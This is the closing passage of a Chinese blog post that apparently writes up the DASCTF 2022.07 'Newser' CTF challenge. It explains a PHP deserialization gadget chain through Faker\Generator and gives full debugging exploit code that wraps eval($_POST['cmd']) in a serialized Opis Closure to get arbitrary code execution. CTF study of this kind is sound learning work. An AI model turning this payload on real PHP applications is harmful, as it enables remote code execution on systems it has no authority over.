<h3 id="exp分析"><a href="#exp分析" class="headerlink" title="exp分析"></a>exp分析</h3><p>这里分析一下调用phpinfo()的原理，<code>__get</code>方法中参数为<code>__username</code>，然后一路传参，在最后<code>call_user_func_array($this-&gt;getFormatter($format), $arguments);</code>那里，第一个参数就是<code>phpinfo</code>，而第二个参数为空，所以就是调用phpinfo</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807002958404.png" alt="image-20220807002958404"></p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807003144032.png" alt="image-20220807003144032"></p>
<p>调用非phpinfo函数</p>
<blockquote>
<p>因为我们是通过__get 传入的，传入函数的参数不可控，phpinfo不需要参数，所以调用了。如果想要只控制函数，造成任意代码执行，可以使用反序列化闭包，这在之前也是有考过的。直接包含closure依赖中的autoload.php</p>
</blockquote>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807004720019.png" alt="image-20220807004720019"></p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807005604354.png" alt="image-20220807005604354"></p>
<p>整个过程中调试的代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">User</span>&#123;</span><br><span class="line">        <span class="title class_">private</span> $<span class="title class_">instance</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$_password</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;instance = <span class="keyword">new</span> <span class="title class_">Faker\Generator</span>(<span class="variable language_">$this</span>);</span><br><span class="line">            <span class="comment">// $this-&gt;_password = [&quot;_username&quot;=&gt;&quot;phpinfo&quot;];</span></span><br><span class="line">            <span class="variable">$func</span> = <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]);&#125;;</span><br><span class="line">            <span class="keyword">require</span> <span class="string">&#x27;vendor\opis\closure\autoload.php&#x27;</span>;     <span class="comment">//相对路径</span></span><br><span class="line">            </span><br><span class="line">            <span class="variable">$b</span>=Opis\<span class="built_in">Closure</span>\<span class="title function_ invoke__">serialize</span>(<span class="variable">$func</span>);   <span class="comment">//调用该serialize()</span></span><br><span class="line">            <span class="variable">$c</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$b</span>); </span><br><span class="line">            <span class="variable language_">$this</span>-&gt;_password = [<span class="string">&quot;_username&quot;</span>=&gt;<span class="variable">$c</span>];</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="number">1</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;password = <span class="variable language_">$this</span>-&gt;_password;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;User &quot;</span>.<span class="variable language_">$this</span>-&gt;instance-&gt;_username.<span class="string">&quot; has created.&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$str1</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;s:8:&quot;password&quot;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="string">&quot;s%3A14%3A%22%00User%00password%22&quot;</span>),<span class="title function_ invoke__">serialize</span>(<span class="keyword">new</span> <span class="title class_">User</span>()));</span><br><span class="line">        <span class="comment">// echo &quot;运行&quot;;</span></span><br><span class="line">        <span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">base64_encode</span>(<span class="variable">$str1</span>));</span><br><span class="line">        <span class="title function_ invoke__">unserialize</span>(<span class="variable">$str1</span>);</span><br><span class="line">       </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Faker</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">Generator</span>&#123;</span><br><span class="line">        <span class="title class_">private</span> $<span class="title class_">formatters</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$obj</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;formatters = &amp;<span class="variable">$obj</span>-&gt;password;</span><br><span class="line">            <span class="comment">// $this-&gt;formatters = [&quot;_username&quot;=&gt;&quot;phpinfo&quot;];</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$attribute</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="comment">// trigger_deprecation(&#x27;fakerphp/faker&#x27;, &#x27;1.14&#x27;, &#x27;Accessing property &quot;%s&quot; is deprecated, use &quot;%s()&quot; instead.&#x27;, $attribute, $attribute);</span></span><br><span class="line">    </span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">format</span>(<span class="variable">$attribute</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">format</span>(<span class="params"><span class="variable">$format</span>, <span class="variable">$arguments</span> = []</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">call_user_func_array</span>(<span class="variable">$this</span>-&gt;<span class="title function_ invoke__">getFormatter</span>(<span class="variable">$format</span>), <span class="variable">$arguments</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="number">2</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;formatters = [];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getFormatter</span>(<span class="params"><span class="variable">$format</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;formatters[<span class="variable">$format</span>])) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;formatters[<span class="variable">$format</span>];</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>最后的Newser的<code>php引用</code>学到了，而<code>包含closure依赖中的autoload.php</code>那里还不清楚原理，要继续学一下。</p>

    </div>
    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>


    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Sk1y | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="MECC3mIv4gyVBwvpqsAnBsX8-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="KuxLFi0F1Upj5MRy1yo9oAwH">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
    <!-- <aside id="toc" class="toc-article" >
      <div class="toc-title">
         <p>
            <span> 目录 </span>
         </p>
      </div>
      
</aside>

<!-- <div style="width:100%;float:left;margin-bottom:25px;">
    <div id="toc" class="toc-article" >
       <div class="toc-title">
          <p>
             <span> 目录 </span>
             <a href="#" onclick="javascript:return openct(this);" title="展开">[+]</a>
          </p>
       </div>
       <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DASCTF2022-07%E8%B5%8B%E8%83%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0"><span class="toc-text">DASCTF2022.07赋能赛复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ez-to-getflag"><span class="toc-text">Ez to getflag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Harddisk"><span class="toc-text">Harddisk</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%9D%E5%AF%B9%E9%98%B2%E5%BE%A1"><span class="toc-text">绝对防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Newser"><span class="toc-text">Newser</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#composer-json%E6%B3%84%E9%9C%B2"><span class="toc-text">composer.json泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%BC%95%E7%94%A8"><span class="toc-text">php引用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9Ephp%E5%BC%95%E7%94%A8%E6%83%85%E5%86%B5%E4%B8%8B"><span class="toc-text">非php引用情况下</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp%E5%88%86%E6%9E%90"><span class="toc-text">exp分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol>
    </div>
 </div>
 <script>
    function openct(e){    
       if (e.innerHTML == '[+]') {
          $(e).attr('title', '收起').html('[-]');
          $(".toc-article ol").show();
       } else {
          $(e).attr('title', '展开').html('[+]');
          $(".toc-article ol").hide();
       }
       e.blur();
       return false;
    }
 </script> --> -->
</body>
</html>
